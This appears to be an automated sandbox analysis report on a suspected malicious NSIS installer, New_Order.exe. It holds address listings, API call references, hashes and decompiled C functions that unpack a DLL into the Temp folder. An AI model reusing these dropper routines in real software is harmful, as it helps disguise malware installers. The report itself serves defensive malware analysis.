                                                                        0x00403080
                                                                        0x00403077
                                                                        0x00000000
                                                                        0x00403077
                                                                        0x00402f65
                                                                        0x00402fe5
                                                                        0x00402fe9
                                                                        0x00402fee
                                                                        0x00000000
                                                                        0x00402fe5
                                                                        0x00402f6e
                                                                        0x00402f73
                                                                        0x00402f7b
                                                                        0x00402fa1
                                                                        0x00402fa7
                                                                        0x00402fb0
                                                                        0x00402fb6
                                                                        0x00402fbb
                                                                        0x00402fc1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402fcb
                                                                        0x00402fd3
                                                                        0x00402fd6
                                                                        0x00402fd6
                                                                        0x00402fdb
                                                                        0x00402fdd
                                                                        0x00402fdd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402fcb
                                                                        0x00402fef
                                                                        0x00402ff5
                                                                        0x00403001
                                                                        0x00403001
                                                                        0x00403004
                                                                        0x0040300a
                                                                        0x0040300a
                                                                        0x00403012
                                                                        0x00000000
                                                                        0x00403012

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402EB2
                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\New_Order.exe,00000400), ref: 00402ECE
                                                                          • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00405C94
                                                                          • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New_Order.exe,C:\Users\user\Desktop\New_Order.exe,80000000,00000003), ref: 00402F1A
                                                                        • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\New_Order.exe" $@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\New_Order.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                        • API String ID: 2803837635-2682049167
                                                                        • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                        • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                        • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                        • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 61%
                                                                        			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				CHAR* _t83;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405AFC(_t82);
				_push(_t82);
				_t83 = "GHFGHFGHFDGDFGDFg";
				if(_t33 == 0) {
					lstrcatA(E00405A8F(E004060F7(_t83, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					E004060F7();
				}
				E004063D2(_t83);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E0040646B(_t83);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405C6B(_t83);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405C90(_t83, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E0040521E(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42f4c8;
						goto L32;
					} else {
						E004060F7(0x40ac38, 0x430000);
						E004060F7(0x430000, _t83);
						E0040618A(_t75, 0x40ac38, _t83, "C:\Users\alfons\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E004060F7(0x430000, 0x40ac38);
						_t62 = E00405813("C:\Users\alfons\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42f4c8 =  &( *0x42f4c8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(_t83);
								_push(0xfffffffa);
								E0040521E();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E0040521E(0xffffffea,  *(_t85 - 8));
				 *0x42f4f4 =  *0x42f4f4 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0xc));
				_push( *((intOrPtr*)(_t85 - 0x20)));
				_t43 = E004030D8(); // executed
				 *0x42f4f4 =  *0x42f4f4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffee);
					} else {
						E0040618A(_t75, _t80, _t83, _t83, 0xffffffe9);
						lstrcatA(_t83,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(_t83);
					E00405813();
					goto L29;
				}
				goto L33;
			}

















                                                                        0x00401759
                                                                        0x00401760
                                                                        0x00401769
                                                                        0x0040176c
                                                                        0x0040176f
                                                                        0x00401774
                                                                        0x00401775
                                                                        0x0040177c
                                                                        0x00401798
                                                                        0x0040177e
                                                                        0x0040177f
                                                                        0x0040177f
                                                                        0x0040179e
                                                                        0x004017a8
                                                                        0x004017a8
                                                                        0x004017ac
                                                                        0x004017af
                                                                        0x004017b4
                                                                        0x004017b6
                                                                        0x004017b8
                                                                        0x004017bd
                                                                        0x004017bd
                                                                        0x004017c8
                                                                        0x004017c8
                                                                        0x004017d9
                                                                        0x004017db
                                                                        0x004017db
                                                                        0x004017dc
                                                                        0x004017dc
                                                                        0x004017df
                                                                        0x004017e2
                                                                        0x004017e5
                                                                        0x004017e5
                                                                        0x004017ec
                                                                        0x004017fb
                                                                        0x00401800
                                                                        0x00401803
                                                                        0x00401806
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00401808
                                                                        0x0040180b
                                                                        0x00401865
                                                                        0x0040186a
                                                                        0x004015b0
                                                                        0x004027bf
                                                                        0x004027bf
                                                                        0x00402a5a
                                                                        0x00402a5d
                                                                        0x00402a5d
                                                                        0x00000000
                                                                        0x0040180d
                                                                        0x00401813
                                                                        0x0040181e
                                                                        0x0040182b
                                                                        0x00401836
                                                                        0x0040184c
                                                                        0x0040184c
                                                                        0x0040184f
                                                                        0x00000000
                                                                        0x00401855
                                                                        0x00401855
                                                                        0x00401856
                                                                        0x00401873
                                                                        0x00402a63
                                                                        0x00402a63
                                                                        0x00402a63
                                                                        0x00401858
                                                                        0x00401858
                                                                        0x00401859
                                                                        0x00401492
                                                                        0x00402387
                                                                        0x00402387
                                                                        0x00402387
                                                                        0x00401856
                                                                        0x0040184f
                                                                        0x00402a65
                                                                        0x00402a69
                                                                        0x00402a69
                                                                        0x00401883
                                                                        0x00401888
                                                                        0x0040188e
                                                                        0x0040188f
                                                                        0x00401890
                                                                        0x00401893
                                                                        0x00401896
                                                                        0x0040189b
                                                                        0x004018a1
                                                                        0x004018a5
                                                                        0x004018a7
                                                                        0x004018af
                                                                        0x004018bb
                                                                        0x004018a9
                                                                        0x004018a9
                                                                        0x004018ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004018ad
                                                                        0x004018c4
                                                                        0x004018ca
                                                                        0x004018cc
                                                                        0x00000000
                                                                        0x004018d2
                                                                        0x004018d2
                                                                        0x004018d5
                                                                        0x004018ed
                                                                        0x004018d7
                                                                        0x004018da
                                                                        0x004018e3
                                                                        0x004018e3
                                                                        0x004018f2
                                                                        0x004018f7
                                                                        0x00402382
                                                                        0x00000000
                                                                        0x00402382
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                        • CompareFileTime.KERNEL32(-00000014,?,GHFGHFGHFDGDFGDFg,GHFGHFGHFDGDFGDFg,00000000,00000000,GHFGHFGHFDGDFGDFg,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                          • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Lat Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,7519EA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,7519EA30), ref: 0040527A
                                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                                          • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll$GHFGHFGHFDGDFGDFg
                                                                        • API String ID: 1941528284-3463827067
                                                                        • Opcode ID: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                        • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                        • Opcode Fuzzy Hash: f339b6a59adf296648f3f8b3866004a1f68460c5fd538596058490c9e85b0c89
                                                                        • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 024D12F6, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 347memoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 024D1621
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 024D1680
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: AllocCreateFileVirtual
                                                                        • String ID: a2f6644de1e4402f88be6b443efc4356
                                                                        • API String ID: 1475775534-42667225
                                                                        • Opcode ID: 40914b9debdb9f1a60f465c20883bf2acf0c80dd880f76990b974c820cf645ed
                                                                        • Instruction ID: d9688bfcf9f7e0a8b3ef233d01f709b3e9abe4105b7fe60fac34c1dcab154527
                                                                        • Opcode Fuzzy Hash: 40914b9debdb9f1a60f465c20883bf2acf0c80dd880f76990b974c820cf645ed
                                                                        • Instruction Fuzzy Hash: 83E15C21E44388EEEF21DBE4DC15BEDBBB5AF05710F10409AEA0CFA191D7B50A85DB16
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 024D0824, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 024D0926
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 024D0AF3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.240323672.00000000024D0000.00000040.00000001.sdmp, Offset: 024D0000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
                                                                        • Opcode ID: cdebcd0448261df0a6f41d09c25969157564de6869333e6711d09fb1921a284e
                                                                        • Instruction ID: 03524b0ede0be462048bfde486cc25845bbce1bf4c6c2b639de6ee0246fc448d
                                                                        • Opcode Fuzzy Hash: cdebcd0448261df0a6f41d09c25969157564de6869333e6711d09fb1921a284e
                                                                        • Instruction Fuzzy Hash: 23A1FE31E00209EFDF10CBE4C995BAEBBB1EF18315F20949AE915BB2A0D3755A91DF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004030D8, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E004030D8(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				char _v88;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x421448;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E00403300( *0x42f498 + _t62);
				}
				if(E004032EA( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004032EA(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004032EA(0x41d448, _t98) == 0) {
								goto L41;
							}
							_t69 = E00405D37(_a8, 0x41d448, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40bdac =  *0x40bdac & 0x00000000;
					 *0x40bda8 =  *0x40bda8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40b890 = 8;
					 *0x415438 = 0x40d430;
					 *0x415434 = 0x40d430;
					 *0x415430 = 0x415430;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004032EA(0x41d448, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40b880 = 0x41d448;
						 *0x40b884 = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40b888 = _t95;
							 *0x40b88c = _v12;
							_t75 = E00406625(0x40b880);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40b888; // 0x422448
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x42f4f4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v88, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040521E(0,  &_v88);
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40b888; // 0x422448
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E00405D37(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                        0x004030e0
                                                                        0x004030e4
                                                                        0x004030e7
                                                                        0x004030ec
                                                                        0x004030ee
                                                                        0x004030ee
                                                                        0x004030f5
                                                                        0x004030f9
                                                                        0x004030fe
                                                                        0x00403100
                                                                        0x00403100
                                                                        0x00403107
                                                                        0x0040310c
                                                                        0x00403117
                                                                        0x00403117
                                                                        0x00403129
                                                                        0x004032d8
                                                                        0x004032d8
                                                                        0x00000000
                                                                        0x0040312f
                                                                        0x00403133
                                                                        0x00403285
                                                                        0x004032c8
                                                                        0x004032ca
                                                                        0x004032ca
                                                                        0x004032d6
                                                                        0x004032dd
                                                                        0x004032e0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032d6
                                                                        0x0040328a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040328c
                                                                        0x0040328f
                                                                        0x00403292
                                                                        0x00403295
                                                                        0x00403297
                                                                        0x00403297
                                                                        0x004032a7
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032ae
                                                                        0x004032b5
                                                                        0x0040327f
                                                                        0x0040327f
                                                                        0x004032da
                                                                        0x004032da
                                                                        0x00000000
                                                                        0x004032da
                                                                        0x004032b7
                                                                        0x004032ba
                                                                        0x004032c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004032c3
                                                                        0x00000000
                                                                        0x0040328f
                                                                        0x0040313f
                                                                        0x00403141
                                                                        0x00403148
                                                                        0x0040314f
                                                                        0x0040314f
                                                                        0x00403156
                                                                        0x0040315e
                                                                        0x00403168
                                                                        0x0040316d
                                                                        0x00403175
                                                                        0x0040317f
                                                                        0x00403182
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403188
                                                                        0x00403188
                                                                        0x00403188
                                                                        0x00403190
                                                                        0x00403192
                                                                        0x00403192
                                                                        0x004031a3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031a9
                                                                        0x004031ac
                                                                        0x004031b2
                                                                        0x004031b8
                                                                        0x004031b8
                                                                        0x004031c3
                                                                        0x004031c9
                                                                        0x004031ce
                                                                        0x004031d5
                                                                        0x004031d8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004031de
                                                                        0x004031e4
                                                                        0x004031e6
                                                                        0x004031ef
                                                                        0x004031f1
                                                                        0x0040321f
                                                                        0x00403225
                                                                        0x0040322e
                                                                        0x00403233
                                                                        0x00403233
                                                                        0x00403238
                                                                        0x00403273
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040323a
                                                                        0x0040323e
                                                                        0x00403255
                                                                        0x0040325a
                                                                        0x0040325d
                                                                        0x00403260
                                                                        0x00403263
                                                                        0x00403267
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040326d
                                                                        0x00403247
                                                                        0x0040324e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403250
                                                                        0x00000000
                                                                        0x00403250
                                                                        0x00403238
                                                                        0x0040327b
                                                                        0x00000000
                                                                        0x0040327b
                                                                        0x00000000
                                                                        0x00403188

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CountTick$wsprintf
                                                                        • String ID: ... %d%%$H$B
                                                                        • API String ID: 551687249-630640294
                                                                        • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                        • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                        • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                        • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004056E4, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004056E4(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                        0x004056ef
                                                                        0x004056f3
                                                                        0x004056f6
                                                                        0x004056fc
                                                                        0x00405700
                                                                        0x00405704
                                                                        0x0040570c
                                                                        0x00405713
                                                                        0x00405719
                                                                        0x00405720
                                                                        0x00405727
                                                                        0x0040572f
                                                                        0x00405731
                                                                        0x00000000
                                                                        0x00405731
                                                                        0x0040573b
                                                                        0x00405742
                                                                        0x00405758
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040575a
                                                                        0x0040575e

                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                        • GetLastError.KERNEL32 ref: 0040573B
                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                        • GetLastError.KERNEL32 ref: 0040575A
                                                                        Strings
                                                                        • C:\Users\user\Desktop, xrefs: 004056E4
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.239947831.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.239942751.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239955178.0000000000408000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239960511.000000000040A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239967463.0000000000415000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239979413.000000000042C000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239985432.0000000000435000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.239991270.0000000000438000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                        • API String ID: 3449924974-1521822154
                                                                        • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                        • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                        • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00406492, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00406492(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x40a014; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}








                                                                        0x004064a9
                                                                        0x004064b2
                                                                        0x004064b4
                                                                        0x004064b4
                                                                        0x004064b8
                                                                        0x004064ca
                                                                        0x004064c4
                                                                        0x004064c4
                                                                        0x004064c4
                                                                        0x004064ce
                                                                        0x004064e2
                                                                        0x004064f6
                                                                        0x004064fd

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004064A9
                                                                        • wsprintfA.USER32 ref: 004064E2
